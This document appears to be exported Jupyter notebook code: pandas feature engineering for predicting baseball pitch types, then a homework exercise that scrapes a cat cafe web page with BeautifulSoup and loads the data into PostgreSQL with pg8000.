first_game_df['L1_pitch_result'] = first_game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
first_game_df['L1_pitch_zone'] = first_game_df['zone'].shift(periods=1)
first_game_df['L1_pitch_zone'] = first_game_df['L1_pitch_zone'].fillna(-1)
#overall strike % (to fill in for first 5 pitches L5_strike_perc)
overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100
#make the trailing 5 pitches:
for index, row in first_game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
first_game_df.at[index, 'L1_pitch_type'] = random_pitch
#for the first 5 rows, use overall pitcher tendencies
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
first_game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
first_game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
else:
current_pitch = first_game_df.at[index, 'pitch_count']
#make a subset of the prev 5 pitches
subset = first_game_df[(first_game_df['pitch_count'] > current_pitch - 6) & (first_game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 5 pitches
subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
first_game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
#if he has thrown that pitch type in last 5
try:
first_game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
first_game_df.at[index, feature] = 0
#apply the batting order features to the game:
first_game_df = make_game_batting_order(first_game_df)
#start the running result with the first game, then repeat the same process for the rest of his games:
new_df = first_game_df
for game in games[1:]:
game_df = df[df['game_pk'] == game].copy() #get df for that game only
game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the pitch count for the game
game_df['L1_pitch_type'] = game_df['pitch_type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1)
game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(-1) #use -1 like the first game so missing zones are coded consistently
#make the trailing 5 pitches:
for index, row in game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
game_df.at[index, 'L1_pitch_type'] = random_pitch
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
else:
current_pitch = game_df.at[index, 'pitch_count']
subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)]
subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
except:
game_df.at[index, feature] = 0
#apply the batting order features to the game:
game_df = make_game_batting_order(game_df)
if game_df is None or game_df.empty:
print('skipping game because of bat data: ' + str(game))
continue
#concatenate this game (w/ updated pitch count and trailing pitches) onto the previous games
new_df = pd.concat([new_df, game_df])
print('# pitches in df after: ' + str(len(new_df)))
return new_df
batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc',
'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc',
'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip',
'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc',
'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value',
'pitchout_perc_faced']
def fill_batting_nans(pitcher_df, batting_order_slot_map):
df = pitcher_df.copy()
for slot in df['batting_order_slot'].unique().tolist():
subset = df[df['batting_order_slot'] == slot].copy()
df = df.drop(subset.index)
for col in batter_cols:
subset[col] = subset[col].fillna(batting_order_slot_map[slot][col])
df = pd.concat([df, subset])
print('finished w/ slot: ' + str(slot))
return df
def get_left_right_pitch_tendencies(pitcher_df):
#split the df into left hand and right handed batters
left = pitcher_df[pitcher_df['stand'] == 'L'].copy()
right = pitcher_df[pitcher_df['stand'] == 'R'].copy()
#assign the normalized value counts for this pitchers pitch types to a dictionary
overall_left = left['pitch_cat'].value_counts(normalize=True).to_dict()
overall_right = right['pitch_cat'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
by_count_left = {}
by_count_right = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
left_subset = left[left['count_cat'] == cat]
right_subset = right[right['count_cat'] == cat]
by_count_left[cat] = left_subset['pitch_cat'].value_counts(normalize=True).to_dict()
by_count_right[cat] = right_subset['pitch_cat'].value_counts(normalize=True).to_dict()
return overall_left, overall_right, by_count_left, by_count_right
def make_tendency_features(pitcher_df, overall_left, overall_right, by_count_left, by_count_right):
#helper functions to vectorize w/ df.apply():
def get_overall_left_perc(x):
return overall_left[x] * 100
def get_overall_right_perc(x):
return overall_right[x] * 100
def get_by_count_left_perc(x):
try:
return by_count_left[x][pitch_type] * 100
except KeyError:
return 0
def get_by_count_right_perc(x):
try:
return by_count_right[x][pitch_type] * 100
except KeyError:
return 0
left = pitcher_df[pitcher_df['stand'] == 'L'].copy()
right = pitcher_df[pitcher_df['stand'] == 'R'].copy()
pitch_types_left = overall_left.keys()
pitch_types_right = overall_right.keys()
#Left
for pitch_type in pitch_types_left:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
left[overall_feature] = pitch_type
left[overall_feature] = left[overall_feature].apply(get_overall_left_perc)
left[count_cat_feature] = left['count_cat'].apply(get_by_count_left_perc)
#Right
for pitch_type in pitch_types_right:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
right[overall_feature] = pitch_type
right[overall_feature] = right[overall_feature].apply(get_overall_right_perc)
right[count_cat_feature] = right['count_cat'].apply(get_by_count_right_perc)
return pd.concat([left,right], sort=False).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number'])
def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])].copy()
#get the pitch tendencies from prior:
overall_left, overall_right, by_count_left, by_count_right = get_left_right_pitch_tendencies(prior_df)
#make the pitch tendencies features on current:
current_df = make_tendency_features(current_df, overall_left, overall_right, by_count_left, by_count_right)
#append the df to the list
df_list.append(current_df)
df = pd.concat(df_list, sort=False)
return df
def make_game_batting_order(game_df):
game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number'])
all_batters = game_df['batter'].unique().tolist()
#re-set the at_bat_number for the game to be sequential starting at 1
at_bat_keys = game_df['at_bat_number'].unique().tolist()
at_bat_values = range(1, len(at_bat_keys)+1)
at_bat_map = dict(zip(at_bat_keys, at_bat_values))
game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map)
#get the first 9 batter ids
first_9_batter_subset = game_df[game_df['at_bat_number'] < 10]
first_9_batters = first_9_batter_subset['batter'].unique().tolist()
#map the batter id to batting order position 1-9
batting_order_map = dict(zip(first_9_batters, range(1,10)))
#for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot
other_batters = list(set(all_batters) - set(first_9_batters))
if len(other_batters) > 0:
for batter in other_batters:
batting_order_map[batter] = 'PH'
try:
game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x])
except KeyError:
game_df = None
return game_df
game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False)
game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher')
return game_df
def get_pitch_tendencies(pitcher_df):
#assign the normalized value counts for this pitchers pitch types to a dictionary
pitcher_tendencies_overall = pitcher_df['pitch_cat'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
pitcher_tendencies_by_count = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
subset = pitcher_df[pitcher_df['count_cat'] == cat]
pitcher_tendencies_by_count[cat] = subset['pitch_cat'].value_counts(normalize=True).to_dict()
return pitcher_tendencies_overall, pitcher_tendencies_by_count
def make_game_pitchcount_and_trailing_pitch_features_and_batting_order(pitcher_df, pitcher_list):
df = pitcher_df.copy()
all_games = []
print('#pitches in df before: ' + str(len(df)))
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df)
games = df['game_pk'].unique().tolist()
for game in games:
#take the first game and make the pitch count feature
game_df = df[df['game_pk'] == game].copy()
game_df['pitch_count'] = range(1, game_df.shape[0] + 1)
#make the L1_pitch type feature:
game_df['L1_pitch_type'] = game_df['pitch_cat'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1)
game_df['L1_ball_high'] = game_df['ball_high'].shift(periods=1)
game_df['L1_ball_low'] = game_df['ball_low'].shift(periods=1)
game_df['L1_ball_left'] = game_df['ball_left'].shift(periods=1)
game_df['L1_ball_right'] = game_df['ball_right'].shift(periods=1)
game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']] = game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']].fillna(-1)
#game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(-1)
#overall strike % (to fill in for first 5 pitches L5_strike_perc)
overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100
#make the trailing 5 pitches:
for index, row in game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
game_df.at[index, 'L1_pitch_type'] = random_pitch
#for the first 5 rows, use overall pitcher tendencies
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
feature = 'L15_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
game_df.at[index, 'L15_strike_perc'] = overall_strike_perc
else:
current_pitch = game_df.at[index, 'pitch_count']
#make a subset of the prev 5 pitches
subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 5 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
#if he has thrown that pitch type in last 5
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
game_df.at[index, feature] = 0
if row['pitch_count'] < 16:
#make a subset of the prev 15 pitches
subset = game_df[(game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 15 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L15_strike_perc = 0
game_df.at[index, 'L15_strike_perc'] = L15_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L15_' + pitch + '_perc'
#if he has thrown that pitch type in last 15
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasn't thrown that type in the prior pitches
except:
game_df.at[index, feature] = 0
else:
#make a subset of the prev 15 pitches
subset = game_df[(game_df['pitch_count'] > current_pitch - 16) & (game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 15 pitches
subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict()
try:
L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L15_strike_perc = 0
game_df.at[index, 'L15_strike_perc'] = L15_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L15_' + pitch + '_perc'
#if he has thrown that pitch type in the last 15
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasn't thrown that type in the last 15
except:
game_df.at[index, feature] = 0
#apply the batting order features to the game:
game_df = make_game_batting_order(game_df)
all_games.append(game_df)
new_df = pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number'])
print('# pitches in df after: ' + str(len(new_df)))
return new_df
def make_prev_ab_walk_basehit_run_and_homerun_features(pitcher_df):
all_games = []
#iterate over each game
for game in pitcher_df['game_pk'].unique():
#make subset df for that game
game_df = pitcher_df[pitcher_df['game_pk'] == game].copy()
#initialize columns to False:
game_df['prev_ab_run_scored'] = False
game_df['prev_ab_homerun'] = False
game_df['prev_ab_walk'] = False
game_df['prev_ab_basehit'] = False
game_df['prev_ab_strikeout'] = False
#this gets the sorted unique at-bat numbers for the game
at_bats = game_df['at_bat_number'].sort_values().unique()
#initialize empty lists to collect the at-bat numbers flagged for each outcome
run_scored = []
homeruns = []
walk_abs = []
basehit_abs = []
strikeout_abs = []
#event strings that count as a walk or a base hit
walk_events = ['walk', 'hit_by_pitch']
basehit_events = ['single', 'double', 'triple', 'home_run']
#starting w/ the 2nd AB, iterate thru to the end of the at_bats (each one looks back at the previous AB):
for ab in at_bats[1:]:
#get the index for the last pitch of the prev AB
prev_ab_last_pitch_index = game_df[game_df['at_bat_number'] == ab-1]['pitch_number'].index.max()
#check if the last pitch resulted in a walk or hit by pitch:
if game_df.loc[prev_ab_last_pitch_index]['events'] in walk_events:
#if so, flag this at-bat
walk_abs.append(ab)
#check if last pitch gave up a basehit:
elif game_df.loc[prev_ab_last_pitch_index]['events'] in basehit_events:
basehit_abs.append(ab)
elif game_df.loc[prev_ab_last_pitch_index]['events'] == 'strikeout':
strikeout_abs.append(ab)
#to check if prev AB resulted in a run scoring: compare score before and after the AB
prev_score = game_df[game_df['at_bat_number'] == ab-1]['bat_score'].values[0]
current_score = game_df[game_df['at_bat_number'] == ab]['bat_score'].values[0]
if current_score > prev_score:
run_scored.append(ab)
#check if last AB gave up a homerun:
if game_df.loc[prev_ab_last_pitch_index]['events'] == 'home_run':
homeruns.append(ab)
#iterate over each at_bat, and add the features to the df where appropriate
for ab in at_bats:
idx = game_df[game_df['at_bat_number'] == ab].index
if ab in walk_abs:
game_df.at[idx, 'prev_ab_walk'] = True
elif ab in basehit_abs:
game_df.at[idx, 'prev_ab_basehit'] = True
elif ab in strikeout_abs:
game_df.at[idx, 'prev_ab_strikeout'] = True
if ab in run_scored:
game_df.at[idx, 'prev_ab_run_scored'] = True
if ab in homeruns:
game_df.at[idx, 'prev_ab_homerun'] = True
all_games.append(game_df)
return pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'pitch_count'])
batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc',
'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc',
'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip',
'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc',
'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value',
'pitchout_perc_faced']
def fill_batting_nans(pitcher_df, batting_order_slot_map):
df = pitcher_df.copy()
for slot in df['batting_order_slot'].unique().tolist():
subset = df[df['batting_order_slot'] == slot].copy()
df = df.drop(subset.index)
for col in batter_cols:
subset[col] = subset[col].fillna(batting_order_slot_map[slot][col])
df = pd.concat([df, subset])
print('finished w/ slot: ' + str(slot))
df = df.sort_values(by=['game_date', 'game_pk', 'pitch_count'])
return df
def add_pb_matchup_priors(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#get all the pitch_types this pitcher has thrown in the past:
pitch_types = prior_df['pitch_cat'].unique().tolist()
try:
pitch_types.remove('PO')
except:
pass
print(pitch_types)
#get a list of the batters in the current_df
current_batters = current_df['batter'].unique().tolist()
batters_dict = {}
current_df_list = []
for batter in current_batters:
batter_df_list = []
#first use subset from prior df
batter_subset = prior_df[prior_df['batter'] == batter].copy()
#if pitcher has never faced this batter before:
if batter_subset.empty:
#get the left or right handedness of the batter
stand = current_df[current_df['batter'] == batter]['stand'].values[0]
#use overall prior tendencies vs left or right handed hitters
overall, by_count = get_pitch_tendencies(prior_df[prior_df['stand'] == stand])
else:
overall, by_count = get_pitch_tendencies(batter_subset)
batters_dict[batter] = by_count
#now use subset of current_df where batter=batter
batter_subset = current_df[current_df['batter'] == batter].copy()
#iterate over the different count_cat types:
for count_cat in ['ahead', 'behind', 'neutral']:
count_subset = batter_subset[batter_subset['count_cat'] == count_cat].copy()
if count_subset.empty:
continue
else:
for pitch in pitch_types:
try:
count_subset['PB_'+pitch] = batters_dict[batter][count_cat][pitch] * 100
except KeyError:
count_subset['PB_'+pitch] = 0
current_df_list.append(count_subset)
current_df = pd.concat(current_df_list, sort=False)
df_list.append(current_df)
new_df = pd.concat(df_list, sort=False).sort_values(by=['game_date', 'game_pk', 'pitch_count'])
return new_df
###Output
_____no_output_____ |
homework5/Homework_5.ipynb | ###Markdown
Homework 5This homework presents a sophisticated scenario in which you must design a SQL schema, insert data into it, and issue queries against it. The scenarioIn the year 20XX, I have won the lottery and decided to leave my programming days behind me in order to pursue my true calling as a [cat cafe](https://en.wikipedia.org/wiki/Cat_caf%C3%A9) tycoon. [This webpage](http://static.decontextualize.com/cats.html) lists the locations of my cat cafes and all the cats that are currently in residence at these cafes.I'm interested in doing more detailed analysis of my cat cafe holdings and the cats that are currently being cared for by my cafes. For this reason, I've hired *you* to convert this HTML page into a workable SQL database. (Why don't I just do it myself? Because I am far too busy hanging out with adorable cats in all of my beautiful, beautiful cat cafes.)Specifically, I want to know the answers to the following questions:* What's the name of the youngest cat at any location?* In which zip codes can I find a lilac-colored tabby?* What's the average weight of cats currently residing at any location (grouped by location)?* Which location has the most cats with tortoiseshell coats?Because I'm not paying you very much, and because I am a merciful person who has considerable experience in these matters, I've decided to *write the queries for you*. (See below.) Your job is just to scrape the data from the web page, create the appropriate tables in PostgreSQL, and insert the data into those tables.Before you continue, scroll down to "The Queries" below to examine the queries as I wrote them. Problem set 1: Scraping the dataYour first goal is to create two data structures, both lists of dictionaries: one for the list of locations and one for the list of cats. You'll get these from scraping two `` tags in the HTML: the first table has a class of `cafe-list`, the second has a class of `cat-list`.Before you do anything else, though, execute the following cell to import Beautiful Soup and create a BeautifulSoup object with the content of the web page:
###Code
from bs4 import BeautifulSoup
from urllib.request import urlopen
html = urlopen("http://static.decontextualize.com/cats.html").read()
document = BeautifulSoup(html, "html.parser")
###Output
_____no_output_____
###Markdown
Let's tackle the list of cafes first. In the cell below, write some code that creates a list of dictionaries with information about each cafe, assigning it to the variable `cafe_list`. I've written some of the code for you; you just need to fill in the rest. The list should end up looking like this:```[{'name': 'Hang In There', 'zip': '11237'}, {'name': 'Independent Claws', 'zip': '11201'}, {'name': 'Paws and Play', 'zip': '11215'}, {'name': 'Tall Tails', 'zip': '11222'}, {'name': 'Cats Meow', 'zip': '11231'}]```
###Code
cafe_list = list()
cafe_table = document.find('table', {'class': 'cafe-list'})
tbody = cafe_table.find('tbody')
for tr_tag in tbody.find_all('tr'):
# print(tr_tag)
zip = tr_tag.find('td', {'class': 'zip'})
name = tr_tag.find('td', {'class': 'name'})
# print(name)
cafe_dict = {'name': name.text, 'zip': zip.text}
cafe_list.append(cafe_dict)
#pass # replace "pass" with your code
cafe_list
###Output
_____no_output_____
###Markdown
Great! In the following cell, write some code that creates a list of cats from the `` tag on the page, storing them as a list of dictionaries in a variable called `cat_list`. Again, I've written a bit of the code for you. Expected output:```[{'birthdate': '2015-05-20', 'color': 'black', 'locations': ['Paws and Play', 'Independent Claws*'], 'name': 'Sylvester', 'pattern': 'colorpoint', 'weight': 10.46}, {'birthdate': '2000-01-03', 'color': 'cinnamon', 'locations': ['Independent Claws*'], 'name': 'Jasper', 'pattern': 'solid', 'weight': 8.06}, {'birthdate': '2006-02-27', 'color': 'brown', 'locations': ['Independent Claws*'], 'name': 'Luna', 'pattern': 'tortoiseshell', 'weight': 10.88},[...many records omitted for brevity...] {'birthdate': '1999-01-09', 'color': 'white', 'locations': ['Cats Meow*', 'Independent Claws', 'Tall Tails'], 'name': 'Lafayette', 'pattern': 'tortoiseshell', 'weight': 9.3}]```Note: Observe the data types of the values in each dictionary! Make sure to explicitly convert values retrieved from `.string` attributes of Beautiful Soup tag objects to `str`s using the `str()` function.
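For the explicit type conversions mentioned in the note above, the pattern for a single row might look like this minimal sketch, where `tr_tag` stands for one row (`tr` tag) of the cat table:
```
name = str(tr_tag.find('td', {'class': 'name'}).string)       # text fields -> str
weight = float(tr_tag.find('td', {'class': 'weight'}).string) # numeric fields -> float
```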
###Code
cat_list = list()
cat_table = document.find('table', {'class': 'cat-list'})
tbody = cat_table.find('tbody')
for tr_tag in tbody.find_all('tr'):
birthdate = tr_tag.find('td', {'class': 'birthdate'})
if birthdate:
birthdate = str(birthdate.text)
color = tr_tag.find('td', {'class':'color'})
if color:
color = str(color.text)
location_ar = []
locations = tr_tag.find_all('td', {'class':'locations'})
for location in locations:
location_ar.append(str(location.text))
pattern = tr_tag.find('td', {'class':'pattern'})
if pattern:
pattern = str(pattern.text)
weight = tr_tag.find('td', {'class':'weight'})
if weight:
weight = float(weight.text) #convert to a float so the weights match the expected output
name = tr_tag.find('td', {'class': 'name'})
if name:
name = str(name.text)
cat_dict = {'birthdate': birthdate, 'color':color, 'pattern':pattern,'locations':location_ar, 'weight':weight,'name':name}
cat_list.append(cat_dict)
cat_list
###Output
_____no_output_____
###Markdown
Problem set 2: Designing the schemaBefore you do anything else, use `psql` to create a new database for this homework assignment using the following command: CREATE DATABASE catcafes; In the following cell, connect to the database using `pg8000`. (You may need to provide additional arguments to the `.connect()` method, depending on the distribution of PostgreSQL you're using.)
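For example, if your PostgreSQL installation requires credentials or a non-default host, the call might look like the sketch below; the user, password, host, and port values are placeholders for your own setup:
```
import pg8000
conn = pg8000.connect(database="catcafes", user="postgres",
                      password="mypassword", host="localhost", port=5432)
```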
###Code
import pg8000
conn = pg8000.connect(database="catcafes")
###Output
_____no_output_____
###Markdown
Here's a cell you can run if something goes wrong and you need to rollback the current query session:
###Code
conn.rollback()
###Output
_____no_output_____
###Markdown
In the cell below, you're going to create *three* tables, necessary to represent the data you scraped above. I've given the basic framework of the Python code and SQL statements to create these tables. I've given the entire `CREATE TABLE` statement for the `cafe` table, but for the other two, you'll need to supply the field names and the data types for each column. If you're unsure what to call the fields, or what fields should be in the tables, consult the queries in "The Queries" below. Hints:* Many of these fields will be `varchar`s. Don't worry too much about how many characters you need—it's okay just to eyeball it.* Feel free to use a `varchar` type to store the `birthdate` field. No need to dig too deep into PostgreSQL's date types for this particular homework assignment.* Cats and locations are in a *many-to-many* relationship. You'll need to create a linking table to represent this relationship. (That's why there's space for you to create *three* tables.)* The linking table will need a field to keep track of whether or not a particular cafe is the "current" cafe for a given cat.
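To make the many-to-many relationship concrete: a cat that has lived at two cafes becomes two rows in the linking table, and the flag marks the current one. For example, mirroring the expected `cat_cafe` output shown further down:
```
 cat_id | cafe_id | active
--------+---------+--------
      1 |       3 | f        <- a previous cafe for cat 1
      1 |       2 | t        <- the current cafe for cat 1
```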
###Code
cursor = conn.cursor()
cursor.execute("""CREATE TABLE cafe (id serial, name varchar(40), zip varchar(5))""")
cursor.execute("""CREATE TABLE cat (birthdate varchar(20), color varchar(20), name varchar(20), pattern varchar(20), weight float, id serial)""")
cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer, active boolean)""")
conn.commit()
###Output
_____no_output_____
###Markdown
After executing the above cell, issuing a `\d` command in `psql` should yield something that looks like the following:``` List of relations Schema | Name | Type | Owner --------+-------------+----------+--------- public | cafe | table | allison public | cafe_id_seq | sequence | allison public | cat | table | allison public | cat_cafe | table | allison public | cat_id_seq | sequence | allison(5 rows)```If something doesn't look right, you can always use the `DROP TABLE` command to drop the tables and start again. (You can also issue a `DROP DATABASE catcafes` command to drop the database altogether.) Don't worry if it takes a few tries to get it right—happens to the best and most expert among us. You'll probably have to drop the database and start again from scratch several times while completing this homework.> Note: If you try to issue a `DROP TABLE` or `DROP DATABASE` command and `psql` seems to hang forever, it could be that PostgreSQL is waiting for current connections to close before proceeding with your command. To fix this, create a cell with the code `conn.close()` in your notebook and execute it. After the `DROP` commands have completed, make sure to run the cell containing the `pg8000.connect()` call again. Problem set 3: Inserting the dataIn the cell below, I've written the code to insert the cafes into the `cafe` table, using data from the `cafe_list` variable that we made earlier. If the code you wrote to create that table was correct, the following cell should execute without error or incident. Execute it before you continue.
###Code
conn.rollback()
cafe_name_id_map = {}
for item in cafe_list:
cursor.execute("INSERT INTO cafe (name, zip) VALUES (%s, %s) RETURNING id",
[str(item['name']), str(item['zip'])])
#print(item)
rowid = cursor.fetchone()[0]
cafe_name_id_map[str(item['name'])] = rowid
#print(rowid)
# print(cafe_name_id_map[str(item['name'])])
conn.commit()
###Output
_____no_output_____
###Markdown
Issuing `SELECT * FROM cafe` in the `psql` client should yield something that looks like this:``` id | name | zip ----+-------------------+------- 1 | Hang In There | 11237 2 | Independent Claws | 11201 3 | Paws and Play | 11215 4 | Tall Tails | 11222 5 | Cats Meow | 11231(5 rows)```(The `id` values may be different depending on how many times you've cleaned the table out with `DELETE`.)Note that the code in the cell above created a dictionary called `cafe_name_id_map`. What's in it? Let's see:
###Code
cafe_name_id_map
print(type(cafe_name_id_map))
###Output
<class 'dict'>
###Markdown
The dictionary maps the *name of the cat cafe to its ID in the database*. You'll need these values later when you're adding records to the linking table (`cat_cafe`).Now the tricky part. (Yes, believe it or not, *this* is the tricky part. The other stuff has all been easy by comparison.) In the cell below, write the Python code to insert each cat's data from the `cat_list` variable (created in Problem Set 1) into the `cat` table. The code should *also* insert the relevant data into the `cat_cafe` table. Hints:* You'll need to get the `id` of each cat record using the `RETURNING` clause of the `INSERT` statement and the `.fetchone()` method of the cursor object.* How do you know whether or not the current location is the "active" location for a particular cat? The page itself contains some explanatory text that might be helpful here. You might need to use some string checking and manipulation functions in order to make this determination and transform the string as needed.* The linking table stores an ID only for both the cat and the cafe. Use the `cafe_name_id_map` dictionary to get the `id` of the cafes inserted earlier.
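One way to handle the asterisk convention (a trailing `*` on a location marks the cat's current cafe, as the expected outputs above and below suggest) is plain string methods. A small sketch, where `loc` is one location string from the scraped list:
```
loc = 'Independent Claws*'
is_current = loc.endswith('*')        # True -> this is the cat's current cafe
cafe_name = loc.rstrip('*').strip()   # 'Independent Claws', a key for cafe_name_id_map
```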
###Code
import re
conn.rollback()
for cat in cat_list:
cursor.execute("INSERT INTO cat(name, birthdate, weight, color, pattern) VALUES (%s, %s, %s, %s, %s) RETURNING id",
[str(cat['name']), str(cat['birthdate']), str(cat['weight']), str(cat['color']), str(cat['pattern'])])
cat_rowid = cursor.fetchone()[0]
#the locations cell holds a comma-separated string; split it into individual cafe names
new_list = cat['locations'][0].split(",")
for location in new_list:
#a trailing asterisk marks the cat's current (active) cafe
match = re.search(r"\*$", location)
print(cat_rowid)
location = location.strip("*")
location = location.strip()
location_int = cafe_name_id_map.get(location)
if match:
print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid)+ " True")
cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)",
[location_int, cat_rowid, True])
else:
print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid) + " False")
cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)",
[location_int, cat_rowid, False])
conn.commit()
###Output
1
